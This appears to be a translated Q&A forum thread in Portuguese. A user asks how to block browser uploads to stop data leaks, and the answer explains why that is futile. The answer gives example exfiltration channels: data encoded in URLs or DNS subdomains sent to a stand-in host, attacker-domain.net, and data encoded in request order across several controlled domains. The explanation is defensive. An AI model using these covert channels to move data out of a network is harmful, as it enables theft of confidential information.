Existe algum navegador ou método para impedir o upload?

Question

Existe algum navegador ou método para impedir o upload?

#1 resposta do (2 votos)

0

Eu quero que minha rede seja protegida. Por isso, o upload, a anexação por email ou outros vazamentos não serão permitidos.

Eu tentei a regra de saída do firewall do Windows. Mas isso força a fechar todas as conexões. Não está funcionando para mim.

Por favor me guie, se houver algum plugin / addOn para impedir o upload / protocolo do navegador ou o Windows exploit para negar o upload do arquivo.

Obrigado por meu problema interessante.

windows firefox browser

por Leonar Aung 22.01.2016 / 06:59

1 resposta

Tags windows firefox browser

É possível acessar o IIS de um servidor na rede doméstica a partir de uma rede 4G de dispositivo Android via VPN? Encontre o número de células a serem somadas para alcançar uma certa quantidade

score 2 · Answer 1

Assim, você deseja impedir que informações de sua rede sejam transferidas para fora de sua rede (ou seja, para a Internet)?

Se um PC puder acessar a Internet de dentro da sua rede (por exemplo, se puder navegar na Web), evitar que vazamentos de informações na Internet sejam quase impossíveis.

Deixe-me dar alguns exemplos de como os dados podem vazar:

E-mail e & Fazendo upload

Isso é o que você está tentando evitar. Pode ser possível evitar isso, mas é inútil, pois há muitas outras maneiras.

URL codificado com vazamento

Um invasor pode usar qualquer navegador para acessar URLs em um formulário como este:

http://attacker-domain.net/leak-some-data/DATA-THAT-SHOULD-BE-LEAKED

Ele precisa apenas de um servidor especial que esteja configurado para salvar todas as solicitações.

DNS codificado com vazamento

Um invasor pode usar o DNS para vazar informações. Usando qualquer programa no seu computador que tenha acesso à Internet. Basta fazer o programa tentar entrar em contato com um endereço como este:

DATA-THAT-SHOULD-BE-LEAKED.attacker-domain.net

Isso levará a uma solicitação de DNS do seu PC para o servidor DNS. A solicitação é encaminhada para o servidor DNS de attacker-domain.net . Assim, o invasor precisa apenas de um servidor DNS modificado que registre as solicitações recebidas.

Codificando dados em padrões de solicitação

O invasor precisa de mais de um domínio / endereço. Para vazar informações, ele poderia usar o padrão de acesso a esses domínios. Por exemplo, para vazar a palavra "olá" ele poderia usar um navegador simples e acessar os domínios que ele controla em uma ordem específica:

h-attacker-domain.net

e-attacker-domain.net

l-attacker-domain.net

l-attacker-domain.net

o-attacker-domain.net

Obviamente, também é possível usar um código binário ou ter vários domínios com o mesmo significado, etc. etc.

Conclusão

Estes são apenas alguns dos muitos métodos que um atacante pode usar para transmitir informações para o mundo exterior. Obviamente, é possível combinar alguns desses métodos e também usar criptografia e / ou ofuscação para dificultar a detecção.

Portanto, evitar o upload por meio do navegador é mais ou menos inútil.